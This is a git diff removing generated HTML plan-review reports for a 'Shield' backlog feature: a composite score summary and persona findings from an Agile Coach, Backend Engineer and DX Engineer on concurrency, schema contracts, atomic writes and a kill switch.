-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#score-summary">Score Summary</a>
-</li>
-<li><a href="#deterministic-trd-gates-run-before-persona-dispatch">Deterministic TRD Gates (run before persona dispatch)</a>
-</li>
-<li><a href="#consolidated-recommendations">Consolidated Recommendations</a>
-<ul>
-<li><a href="#p0--must-fix-blocks-sprint-planning">P0 — Must Fix (blocks sprint planning)</a></li>
-<li><a href="#p1--should-fix-plan-quality">P1 — Should Fix (plan quality)</a></li>
-<li><a href="#p2--nice-to-have">P2 — Nice to Have</a></li>
-</ul>
-</li>
-<li><a href="#detailed-agent-findings">Detailed Agent Findings</a>
-</li>
-</ul>
-</nav>
-<h1 id="plan-review--shield-backlog">Plan Review — Shield Backlog</h1>
-<p><strong>Date:</strong> 2026-05-27
-<strong>Plan:</strong> <code>docs/shield/backlog-20260527/</code> (plan.md + trd.md + plan.json)
-<strong>Source PRD:</strong> prd.md (type: lean) · prior PRD-review: <code>reviews/prd/2026-05-27_2</code> (Ready, 3.12)
-<strong>Reviewers:</strong> DX Engineer, Agile Coach, Backend Engineer, Security Engineer, SRE, Product Manager (PM1–PM10)
-<strong>Composite Score:</strong> <strong>B (3.14) — Ready</strong> · <strong>1 P0</strong> (deterministic gate) · 12 P1 · 13 P2</p>
-<blockquote>
-<p><strong>Verdict: Ready, pending one P0 doc-fix.</strong> The plan is well-structured, MVP-disciplined, and
-error-handling-first; the milestone DAG is acyclic and fully covered; the reconciliation
-read-contract was <em>verified accurate</em> against the live <code>manifest.json</code>/<code>plan-sidecar.schema.json</code>.
-The single P0 is a cheap one-line paraphrase (TRD §2 restates PRD §3 verbatim). The 12 P1s
-cluster around four real gaps the implementers should close first: the <strong>skill write-helper
-signature is still open</strong>, <strong>atomicity is conflated with isolation</strong> (lost-update path), the
-<strong>match heuristic is undefined</strong>, and several <strong>load-bearing guarantees lack tests / shipped
-toggles</strong> (F6 no-stamping, validate-or-refuse, the §14 kill switch, removal audit logging).</p>
-</blockquote>
-<h2 id="score-summary">Score Summary</h2>
-<table>
-<thead>
-<tr>
-<th>Persona</th>
-<th style="text-align:center">Weight</th>
-<th style="text-align:center">Grade</th>
-<th>Key Finding</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.4)</td>
-<td>Clear &amp; sound, but 3 <code>design_refs</code> point at non-existent LLDs and the capture-helper signature is deferred</td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center">B (3.36)</td>
-<td>Sprint-ready with an acyclic, fully-covered DAG; only EPIC-2-S2's match heuristic is not estimable</td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.33)</td>
-<td>Read-contract verified accurate; held back by open helper signature + atomicity≠isolation</td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td style="text-align:center">1.0</td>
-<td style="text-align:center">B (3.05)</td>
-<td>Sound for local single-actor tooling; N1 race + F6 no-stamping asserted but untested</td>
-</tr>
-<tr>
-<td>SRE</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center">B (3.0)</td>
-<td>Failure-mode analysis &amp; staged rollout are A-grade; day-2 instrumentation is thin</td>
-</tr>
-<tr>
-<td>Product Manager</td>
-<td style="text-align:center">0.7</td>
-<td style="text-align:center"><strong>A (3.7)</strong></td>
-<td>Strong on impact/scope/prioritization/reversibility; PM10 business-value baseline unvalidated (C)</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite</strong> = (3·1.0 + 3·0.7 + 3·1.0 + 3·1.0 + 3·0.7 + 4·0.7) / 5.1 = <strong>3.14 → B — Ready</strong></p>
-<h2 id="deterministic-trd-gates-run-before-persona-dispatch">Deterministic TRD Gates (run before persona dispatch)</h2>
-<table>
-<thead>
-<tr>
-<th>Gate</th>
-<th>Rule</th>
-<th>Result</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>0a</td>
-<td>Schema validation (<code>validate_plan.py</code>)</td>
-<td>✅ PASS (exit 0)</td>
-</tr>
-<tr>
-<td>0b</td>
-<td>TRD 14-section presence (<code>validate_trd.py</code>)</td>
-<td>✅ PASS (exit 0)</td>
-</tr>
-<tr>
-<td>0c</td>
-<td>Stale-anchor on <code>design_refs[]</code></td>
-<td>✅ PASS — all <code>trd.md#…</code> anchors live; <code>lld</code> refs have null anchors (intentional TODO)</td>
-</tr>
-<tr>
-<td>0d</td>
-<td>PRD↔TRD duplication (&gt;80-char overlap)</td>
-<td>❌ <strong>FAIL → P0</strong> — TRD §2 restates PRD §3 with a <strong>92-char</strong> verbatim overlap</td>
-</tr>
-<tr>
-<td>0e</td>
-<td>Implementation-manual (§7 fence &gt;20 lines)</td>
-<td>✅ PASS — §7 is a 13-line ASCII diagram, not code</td>
-</tr>
-</tbody>
-</table>
-<h2 id="consolidated-recommendations">Consolidated Recommendations</h2>
-<h3 id="p0--must-fix-blocks-sprint-planning">P0 — Must Fix (blocks sprint planning)</h3>
-<ol>
-<li><strong>[Gate 0d] Paraphrase TRD §2 so it no longer restates PRD §3 verbatim.</strong> The opening sentence shares a 92-char run (<code>&quot; — during /research, while writing a PRD, mid-/plan, and especially during /implement &quot;</code>) with PRD §3, exceeding the 80-char duplication threshold. Rewrite TRD §2 to <em>summarize</em> the problem in technical-framing terms and link to PRD §3 rather than repeating it. (One-line fix; mechanical.)</li>
-</ol>
-<h3 id="p1--should-fix-plan-quality">P1 — Should Fix (plan quality)</h3>
-<ol>
-<li><strong>[Backend, DX] Lock the skill write-helper signature in EPIC-1-S1/S2 ACs.</strong> This is the carried-forward PRD-review P1, but TRD §12 Q3 still punts the signature to &quot;/lld or implementation.&quot; Pin name, module path, params, return, and raise-on-invalid behavior now (e.g. <code>capture(text, *, kind=&quot;task&quot;, feature=None, epic=None, source) -&gt; entry_id</code> in <code>shield/scripts/backlog_store.py</code>) — downstream skills cannot be built/tested against an undefined shape.</li>
-<li><strong>[Backend, Security] Name the concurrency strategy — atomicity ≠ isolation.</strong> N1 defends &quot;capture racing reconciliation,&quot; but temp-then-rename alone does not prevent lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption <em>where N1 describes the threat</em> (N5 already says &quot;single actor&quot;) or add a lock / re-read-and-merge / <code>O_EXCL</code>. Add an interleaved-capture eval.</li>
-<li><strong>[DX, Agile, Backend] Define the feature/epic match + suggestion heuristic.</strong> Replace &quot;best match&quot; / &quot;names expected stable&quot; (EPIC-2-S2, EPIC-3-S2) with a concrete rule: normalization (case/whitespace), tie-break/ambiguity → entry stays, and epic-rename behavior. Add a measurable AC and resolve PRD §9's open &quot;discovery cost&quot; question (or land <code>/lld epic-suggester</code>).</li>
-<li><strong>[Security] Add an eval asserting promotion leaves <code>plan.json</code> byte-unchanged (F6 no-stamping).</strong> F6 is the load-bearing trust boundary; it has an AC but is absent from EPIC-4-S1's listed eval coverage.</li>
-<li><strong>[Security] Add an AC that a malformed/partial <code>backlog.json</code> on read is <em>refused</em> with a named error.</strong> &quot;Validate-or-refuse on read&quot; (F2/N1) currently has no AC proving the refusal path (only crash-atomicity is tested).</li>
-<li><strong>[SRE] Ship the &quot;disable eager prune&quot; kill switch as a story/task.</strong> §14 names it as the rollback action but no story delivers the toggle — add a <code>.shield.json</code> flag (e.g. <code>backlog.auto_reconcile</code>) disabling eager prune and lazy sweep independently. Today the documented mitigation is unactionable.</li>
-<li><strong>[SRE] Log successful removals with rationale.</strong> Only the never-remove-on-doubt path logs (N3). Eager prune / lazy sweep should log <code>{entry id, feature, epic, match-kind, triggering run, gating plan.json}</code> to a defined destination — otherwise a confident-but-wrong removal leaves a git diff with no reasoning.</li>
-<li><strong>[SRE] Close the uncommitted-state recovery gap.</strong> Eager prune fires at end-of-<code>/plan</code>/<code>/implement</code>, possibly before <code>backlog.json</code> is committed — at which point <code>git revert</code> (N4) cannot recover the entry. Commit before the destructive prune, or write pruned entries to a transient <code>.shield/backlog-removed.log</code>.</li>
-<li><strong>[SRE] Instrument the N2 ~1s budget.</strong> &quot;Revisit if breached&quot; (Q1 epic-index) is unfalsifiable without timing — add a debug-gated latency line to <code>/backlog</code> view so the breach signal isn't &quot;a human notices slowness.&quot;</li>
-<li><strong>[PM10] Ground the business-value claim with a rough baseline.</strong> The whole justification rests on an explicitly unvalidated assumption that lost future-work volume is high enough to justify the tool. Count lost/re-derived items over a recent week (git history / chat) before committing all four milestones.</li>
-<li><strong>[Backend] Specify the <code>id</code> contract.</strong> <code>id</code> is required but its type, generation strategy, and uniqueness are undefined, yet remove/promote/prune all key off it. Add type + generation (uuid4/monotonic/slug) + a uniqueness constraint in EPIC-1-S1, plus an AC: &quot;schema rejects duplicate <code>id</code>.&quot;</li>
-<li><strong>[Backend] State the &quot;epic landed&quot; gate as one precise predicate.</strong> F7 (&quot;epic's work appears&quot;), EPIC-3-S2 AC (&quot;epic's stories appear&quot;), and the schema (<code>stories[] minItems:1</code>) say it three ways. Pin it: &quot;epic with matching id/name is present in <code>plan.json.epics[]</code>; story <code>status</code> is <strong>not</strong> consulted.&quot;</li>
-</ol>
-<h3 id="p2--nice-to-have">P2 — Nice to Have</h3>
-<ol>
-<li><strong>[DX]</strong> Name the CI entrypoint + path-filter glob in EPIC-4-S1 (&quot;wire into CI&quot; is not actionable as written).</li>
-<li><strong>[DX]</strong> Add an explicit intra-epic story-dependency note for EPIC-3 (S1+S2 must land before S3).</li>
-<li><strong>[DX]</strong> Specify the badge render format once (EPIC-2-S1 shows it only as an example) and add a local-dev/dry-run loop to the backlog SKILL.md.</li>
-<li><strong>[Agile]</strong> Add code-review + &quot;marketplace version published&quot; steps to the implied Definition of Done (EPIC-4-S2).</li>
-<li><strong>[Agile]</strong> Land or stub <code>/lld backlog-store</code>, <code>/lld epic-suggester</code>, <code>/lld reconciler</code> so the unresolved TODO <code>design_refs</code> resolve before sprint start.</li>
-<li><strong>[Backend]</strong> Add a no-op <code>migrate(doc)-&gt;doc</code> seam + test, or explicitly scope the schema_version AC as doc-only-until-v2 (it currently overstates &quot;migration policy present&quot; as working code).</li>
-<li><strong>[Security]</strong> Add a <code>--dry-run</code> reconciliation canary so a maintainer validates against their real backlog before trusting auto-removal.</li>
-<li><strong>[Security]</strong> Add a fixture for epic-name collision across two different features (PRD §10 risk / §14 trigger) asserting the entry stays.</li>
-<li><strong>[Security]</strong> Define the security purpose of the <code>source ∈ {user, agent}</code> field (provenance/audit-only vs. trust signal) and address agent-injected entries flowing into <code>/plan</code>.</li>
-<li><strong>[Security]</strong> Note in N4/EPIC-1-S4 that git-revert recoverability only covers committed entries — a manual remove of an uncommitted entry is unrecoverable by design.</li>
-<li><strong>[SRE]</strong> Give the manual <code>/backlog</code> audit a concrete cadence and &quot;what reading triggers action.&quot;</li>
-<li><strong>[SRE]</strong> Add a recovery-rehearsal eval (assert <code>git revert</code> / restore brings a wrongly-pruned entry back).</li>
-<li><strong>[PM5]</strong> Add a 2–3 sentence plain-language executive summary atop <code>trd.md</code> and <code>plan.md</code> before the schema-/pipeline-heavy detail.</li>
-</ol>
-<h2 id="detailed-agent-findings">Detailed Agent Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Agent</th>
-<th style="text-align:center">Grade</th>
-<th>Detailed Report</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/dx-engineer.md">detailed/dx-engineer.md</a></td>
-</tr>
-<tr>
-<td>Agile Coach</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/agile-coach.md">detailed/agile-coach.md</a></td>
-</tr>
-<tr>
-<td>Backend Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/backend-engineer.md">detailed/backend-engineer.md</a></td>
-</tr>
-<tr>
-<td>Security Engineer</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/security-engineer.md">detailed/security-engineer.md</a></td>
-</tr>
-<tr>
-<td>SRE</td>
-<td style="text-align:center">B</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/sre.md">detailed/sre.md</a></td>
-</tr>
-<tr>
-<td>Product Manager (PM1–PM10)</td>
-<td style="text-align:center">A</td>
-<td><a href="../../../../reviews/plan/2026-05-27/detailed/product-manager.md">detailed/product-manager.md</a></td>
-</tr>
-</tbody>
-</table>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
deleted file mode 100644
index f7582d3e..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/agile-coach.html
+++ /dev/null
@@ -1,133 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="agile-coach--detailed-findings">Agile Coach — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> A mature re-plan: prior findings folded and traceable, decisions LOCKED, milestone DAG verifiably acyclic with full story coverage and no dangling references, ACs overwhelmingly independently testable. Short of A because EPIC-3-S3 carries an either/or recovery AC that can't be written as a single test, and the same story bundles four concerns.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>AC1</td>
-<td>Story sizing</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC2</td>
-<td>Story independence</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>AC3</td>
-<td>Dependency ordering</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC4</td>
-<td>Context completeness</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC5</td>
-<td>Requirements clarity</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC6</td>
-<td>Implementation step quality</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC7</td>
-<td>Acceptance criteria testability</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC8</td>
-<td>Sprint-readiness</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC9</td>
-<td>Estimation feasibility</td>
-<td>A</td>
-</tr>
-<tr>
-<td>AC10</td>
-<td>Definition of Done alignment</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC13</td>
-<td>Milestone coverage</td>
-<td>A (M1=5, M2=1, M3=5)</td>
-</tr>
-<tr>
-<td>AC14</td>
-<td>Milestone reference integrity</td>
-<td>A (no dangling milestone_id)</td>
-</tr>
-<tr>
-<td>AC15</td>
-<td>Milestone exit-criteria testability</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>AC16</td>
-<td>Milestone DAG integrity</td>
-<td>A (acyclic M1→M2→M3)</td>
-</tr>
-</tbody>
-</table>
-<h2 id="findings">Findings</h2>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>AC7</td>
-<td>EPIC-3-S3 AC5 encodes an unresolved OR (&quot;backlog.json committed before the prune <strong>or</strong> appended to .shield/backlog-removed.log&quot;) — not writable as one pass/fail test. Pick one mechanism (LLD leans to the removed-log) and rewrite as a single asserted behavior.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC1/AC15</td>
-<td>EPIC-3-S3 bundles four concerns (eager, lazy, kill switch, recovery); M3's 6th exit criterion folds 10 eval behaviors into one line. Consider splitting S3 into S3a (triggers) + S3b (kill switch + recovery + latency). Not blocking.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC8/AC9</td>
-<td>M2 carries a single story while EPIC-2-S1 sits in M1 — EPIC-2 deliberately straddles M1/M2. Note this in the plan so it doesn't read as a numbering slip.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>AC6</td>
-<td>N2 ~1s target is verified only by a debug line, not an assertion. State the WARN threshold the human checks against (e.g. &quot;log WARN if view+sweep &gt; 1s&quot;).</td>
-</tr>
-</tbody>
-</table>
-<p>No P0 findings. Dependency ordering and milestone integrity (coverage, references, DAG, exit-criteria testability) all pass programmatic verification.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
deleted file mode 100644
index a1ce3ec0..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/backend-engineer.html
+++ /dev/null
@@ -1,99 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="backend-engineer--detailed-findings">Backend Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: B−.</strong> A well-structured, honestly-bounded plan with excellent error/idempotency/testability discipline, held back from B+/A− by three contract defects that only surface when the design is placed next to the real <code>manifest.json</code> / <code>plan.json</code> / <code>shield.schema.json</code>.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>F8 &quot;epic landed&quot; predicate consistency</td>
-<td>B</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Single-writer concurrency claim (N1)</td>
-<td>B+</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Atomic-write + validate-or-refuse correctness</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>4</td>
-<td>The id contract</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>5</td>
-<td>LLD API contracts implementable as specified</td>
-<td>C+</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Python packaging via uv</td>
-<td>B</td>
-</tr>
-<tr>
-<td>7</td>
-<td>Error semantics</td>
-<td>A−</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Idempotency</td>
-<td>A</td>
-</tr>
-<tr>
-<td>9</td>
-<td>Testability</td>
-<td>A−</td>
-</tr>
-</tbody>
-</table>
-<h2 id="p0-findings-verified-against-live-schemas">P0 findings (verified against live schemas)</h2>
-<h3 id="p0-1--reconcilesuggest_-contracts-dont-match-the-real-manifestjsonplanjson-shapes">P0-1 — <code>reconcile</code>/<code>suggest_*</code> contracts don't match the real <code>manifest.json</code>/<code>plan.json</code> shapes</h3>
-<p>Every cross-document reference treats <code>manifest</code> and <code>plans</code> as opaque <code>dict</code>s, but the live artifacts have a specific shape the contracts contradict. <code>manifest.json</code> is <code>{&quot;schema_version&quot;:…, &quot;features&quot;:[ {name, artifacts:{research,prd,plan_json,plan_md,plan_arch_md}, reviews, updated} ]}</code> — a list keyed by <code>name</code>, with a <strong>boolean</strong> <code>plan_json</code> flag and <strong>no plan path stored</strong>. <code>reconcile(entry, *, manifest: dict, plans: dict)</code> (<code>lld-reconciler.md</code> §5) never defines <code>plans</code> and never says the reconciler must <em>derive</em> <code>docs/shield/&lt;feature&gt;/plan.json</code>.
-<strong>Fix:</strong> pin the real shapes in <code>lld-reconciler.md</code> §5 and <code>lld-epic-suggester.md</code> §5; define <code>plans: dict[str, dict]</code> (feature-slug → parsed plan.json) populated by reading <code>docs/shield/&lt;feature&gt;/plan.json</code> for each feature whose <code>artifacts.plan_json is True</code>; state the flag is <code>plan_json</code> (boolean) and the path is derived. Add an EPIC-4-S1 fixture from the actual manifest schema.</p>
-<h3 id="p0-2--f8-match-existing-epic-by-id-matches-a-positional-slot-not-a-stable-identity">P0-2 — F8 &quot;match existing-epic by id&quot; matches a positional slot, not a stable identity</h3>
-<p>Epic ids are positional <code>EPIC-N</code> slugs assigned by <code>/plan</code>, not durable identifiers. After any re-<code>/plan</code>, <code>EPIC-2</code> points at a different epic. An existing-epic backlog entry stamped <code>EPIC-2</code> will then match the wrong epic (false removal) or fail to match (entry rots). Verified: <code>plan-trd-refactor-20260524</code> <code>EPIC-2 = &quot;Story schema and design traceability&quot;</code> vs <code>pm-restructure-v0-20260521</code> <code>EPIC-2 = &quot;Global authoring…&quot;</code>.
-<strong>Fix:</strong> match existing epics by normalized <code>name</code> too (same predicate as proposed-new); treat <code>EPIC-N</code> only as a within-a-single-plan disambiguator. If id-matching is kept, document the re-plan failure mode and add a &quot;epic reordered across a re-plan&quot; eval.</p>
-<h3 id="p0-3--kill-switch-backlogauto_reconcile-cannot-live-in-shieldjson-as-the-schema-stands">P0-3 — Kill switch <code>backlog.auto_reconcile</code> cannot live in <code>.shield.json</code> as the schema stands</h3>
-<p><code>shield/schemas/shield.schema.json</code> has <code>additionalProperties: false</code> and properties <code>[project, domains, output_dir, reviewers, devcontainer, external_skills]</code> — no <code>backlog</code> key. Adding <code>backlog.auto_reconcile</code> to a real <code>.shield.json</code> fails validation, and no story includes the schema change.
-<strong>Fix:</strong> add a task+AC (EPIC-3-S3, reflected in EPIC-4-S2 version bump) to extend <code>shield.schema.json</code> with an optional <code>backlog</code> object (<code>{auto_reconcile: bool, default true}</code>) + a config example. Without this the documented first-line rollback (TRD §14) is unshippable.</p>
-<h2 id="p1-findings">P1 findings</h2>
-<ul>
-<li><strong>P1-1</strong> — Concurrency eval tests a race the single-writer design says cannot occur. Nothing enforces serialization (no lock). Either the race can't happen (eval vacuous) or it can (read-modify-write is not atomic — <code>os.replace()</code> only makes the rename atomic; loser's entry is silently dropped). Resolve: rescope to sequential, OR add a minimal compare-before-replace/merge and test it.</li>
-<li><strong>P1-2</strong> — F2/EPIC-1-S1 AC says &quot;the schema rejects duplicate id&quot;; JSON Schema (2020-12) cannot express property-level array uniqueness. Reword to &quot;the <strong>validator</strong> (<code>validate_backlog.py</code>) rejects duplicate id with <code>duplicate_entry_id</code>.&quot;</li>
-<li><strong>P1-3</strong> — Feature &quot;name&quot; (manifest) vs &quot;folder slug&quot; (reconciliation key) conflated. Pin the invariant (<code>features[].name</code> == folder slug) and make <code>suggest_feature</code> return that field; add a fixture asserting the suggested value resolves to an existing <code>docs/shield/&lt;value&gt;/</code> path.</li>
-<li><strong>P1-4</strong> — Packaging model unresolved. F3 (&quot;every capturing skill builds against this signature&quot;) implies an importable module, but EPIC-4-S2 hedges (&quot;if backlog scripts are packaged&quot;). Decide at plan time — recommend packaging with a <code>pyproject.toml</code> so the version bump is unconditional; document how a skill calls <code>capture()</code>.</li>
-</ul>
-<h2 id="p2-findings">P2 findings</h2>
-<ul>
-<li><strong>P2-1</strong> — Atomic write omits <code>os.fsync()</code> before <code>os.replace()</code> (power-loss window) and uses a fixed <code>.tmp</code> name (stale-temp collision). Add fsync + unique temp suffix.</li>
-<li><strong>P2-2</strong> — <code>read() -&gt; dict</code> forces every caller to re-validate shape; consider returning the pydantic model (<code>read() -&gt; BacklogDoc</code>).</li>
-<li><strong>P2-3</strong> — <code>RemovalDecision</code> / <code>Candidate</code> payloads referenced but <code>RemovalDecision</code>'s fields (the F9 log fields) are undefined. Add a 4-field dataclass in <code>lld-reconciler.md</code>.</li>
-</ul>
-<p><strong>Verification sources:</strong> <code>shield/schemas/plan.schema.json</code>, <code>shield/schemas/shield.schema.json</code>, <code>docs/shield/manifest.json</code>.</p>
-
-</body></html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
deleted file mode 100644
index 3c6c1ab6..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-29/detailed/dx-engineer.html
+++ /dev/null
@@ -1,159 +0,0 @@
-<!DOCTYPE html>
-<html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1">
-<meta name="sidecar" content="../../../../plan.json">
-<title>Shield Plan Review — Backlog</title>
-<style>
- body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
- h1,h2,h3,h4{line-height:1.25;margin-top:1.6em} h1{color:#1a73e8;border-bottom:2px solid #e1e4e8;padding-bottom:.3em} h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
- code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em} pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto} pre code{background:none;padding:0}
- table{border-collapse:collapse;width:100%;margin:1em 0} th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top} th{background:#f6f8fa}
- blockquote{border-left:4px solid #1a73e8;margin:1em 0;padding:.2em 1em;color:#57606a}
-</style></head><body>
-<h1 id="dx-engineer--detailed-findings">DX Engineer — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<p><strong>Persona grade: A−.</strong> An unusually handoff-ready plan — locked signatures, named errors, an atomic-write recipe, and a kill switch make most stories startable without tribal knowledge. Falls short of A on two interface contracts a developer hits in M1/M3 that are referenced but not pinned.</p>
-<h2 id="evaluation-points-af">Evaluation points (A–F)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Point</th>
-<th>Grade</th>
-<th>Note</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>DX1</td>
-<td>Plan clarity</td>
-<td>A</td>
-<td>TRD &quot;In one line&quot; + Milestones table convey the goal in &lt;30s.</td>
-</tr>
-<tr>
-<td>DX2</td>
-<td>Story actionability</td>
-<td>A−</td>
-<td>Each story has description + tasks + ACs + design_refs.</td>
-</tr>
-<tr>
-<td>DX3</td>
-<td>Implementation step detail</td>
-<td>A−</td>
-<td>Exact file paths, locked signature, write recipe, validator command.</td>
-</tr>
-<tr>
-<td>DX4</td>
-<td>Ambiguity audit</td>
-<td>B+</td>
-<td>&quot;LOCKED&quot; decisions, named errors; residual: N2 &quot;≲1s&quot;, &quot;audit cadence (e.g. monthly)&quot;.</td>
-</tr>
-<tr>
-<td>DX5</td>
-<td>Context sufficiency</td>
-<td>A</td>
-<td>PRD framing, TRD §1 reader list, §8 alternatives, carried-forward trace.</td>
-</tr>
-<tr>
-<td>DX6</td>
-<td>Dependency clarity</td>
-<td>A</td>
-<td>Milestone DAG + explicit EPIC-3-S3 intra-epic dependency.</td>
-</tr>
-<tr>
-<td>DX7</td>
-<td>Tool &amp; access requirements</td>
-<td>B</td>
-<td><code>uv</code> named; missing Python version + pydantic/jsonschema prereq statement.</td>
-</tr>
-<tr>
-<td>DX8</td>
-<td>Handoff readiness</td>
-<td>A−</td>
-<td>Locked signatures, named errors, atomic-write recipe, kill-switch key.</td>
-</tr>
-<tr>
-<td>DX9</td>
-<td>Service boundaries</td>
-<td>A</td>
-<td>Three components cleanly separated; single writer.</td>
-</tr>
-<tr>
-<td>DX10</td>
-<td>API &amp; data flow design</td>
-<td>B+</td>
-<td><code>manifest.json</code> field names not pinned as ground truth.</td>
-</tr>
-<tr>
-<td>DX11</td>
-<td>Deployment strategy</td>
-<td>A−</td>
-<td>Additive behind kill switch; 3-tier rollback.</td>
-</tr>
